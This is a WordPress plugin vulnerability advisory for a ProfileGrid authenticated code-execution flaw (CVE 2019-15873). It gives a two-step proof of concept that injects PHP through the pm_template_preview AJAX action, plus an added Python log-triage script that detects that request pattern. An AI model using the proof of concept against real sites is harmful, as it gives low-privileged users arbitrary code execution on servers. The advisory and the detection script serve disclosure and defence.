ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution



Description
Versions of the ProfileGrid – User Profiles, Groups and Communities plugin prior to 2.8.6 are vulnerable to arbitrary code execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin.
Proof of Concept
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();

Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php
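
For triage on a site that ran an affected version, the two requests above leave a recognisable pair in the web server access log. The Python below is an added example, not part of the original advisory or the plugin's code. It assumes Combined Log Format, a 10-minute correlation window and constructed sample lines; POST bodies are not logged, so the action parameter cannot be matched and the script correlates on client IP instead.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Paths taken from the advisory's proof of concept.
AJAX = "/wp-admin/admin-ajax.php"
PREVIEW = ("/wp-content/plugins/profilegrid-user-profiles-groups-and-communities"
           "/admin/partials/email-preview.php")
WINDOW = timedelta(minutes=10)  # assumption: correlation window, tune per site

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_preview_hits(lines):
    """Return one finding per request to email-preview.php, noting whether the
    same client POSTed to admin-ajax.php within WINDOW before it."""
    last_ajax_post = {}  # client IP -> time of its latest POST to admin-ajax.php
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        ip, ts, method, target, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        # Drop the query string and decode %xx; endswith() covers sub-directory installs.
        path = unquote(urlsplit(target).path)
        if method == "POST" and path.endswith(AJAX):
            last_ajax_post[ip] = when
        elif path.endswith(PREVIEW):
            prior = last_ajax_post.get(ip)
            findings.append({
                "ip": ip, "time": when.isoformat(), "status": int(status),
                "ajax_post_before": prior is not None
                                    and timedelta(0) <= when - prior <= WINDOW,
            })
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [18/May/2018:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 15 "-" "-"',
    '203.0.113.7 - - [18/May/2018:10:00:05 +0000] "GET ' + PREVIEW + ' HTTP/1.1" 200 80211 "-" "-"',
    '198.51.100.4 - - [18/May/2018:10:05:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2 "-" "-"',
    '198.51.100.9 - - [18/May/2018:11:00:00 +0000] "GET /blog' + PREVIEW + '?x=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_preview_hits(SAMPLE):
        print(finding)
```

A finding with ajax_post_before set is a lead for review, not proof of compromise; on an affected install, the current contents of email-preview.php should be inspected alongside it.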

Affects Plugin

References

CVE 2019-15873
URL https://plugins.trac.wordpress.org/changeset/1877071/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Submitter Twitter ripstech
Views 6128
Verified No
WPVDB ID 9086

Timeline

Publicly Published 2018-05-18 (over 1 year ago)
Added 2018-05-18 (over 1 year ago)
Last Updated 2019-11-01 (13 days ago)
